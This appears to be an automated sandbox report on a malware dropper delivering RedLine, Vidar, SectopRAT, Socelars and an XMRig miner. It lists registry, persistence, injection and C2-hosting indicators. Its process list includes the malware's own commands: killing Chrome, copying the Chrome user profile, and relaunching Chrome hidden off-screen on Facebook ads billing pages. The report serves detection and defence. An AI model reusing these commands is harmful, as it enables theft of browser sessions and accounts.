Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4464 set thread context of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
| PID 2828 set thread context of 5188 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 9aa6e16872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 1710990cbc64.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c862a054a35.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe
4f5baa1083db067.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe
1710990cbc64.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe
08240101651be7e1.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe
53516815d3135fe3.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe
c862a054a35.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe
9aa6e16872.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe
453c5fa76a849.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe
f34b9ab9db6d16.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe
e4b2f18fb52218.exe
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe
08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 396 -ip 396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 564
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe
"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe" -a
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527219 0
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2936 -ip 2936
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 356
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4f43cc40,0x7ffc4f43cc4c,0x7ffc4f43cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2188,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1776 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2288,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2496 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3424,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3548,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3788 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3860,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3972,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5036,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4408 -s 740
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3984,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3496 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3432 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4156,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4652,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3476,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3528 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
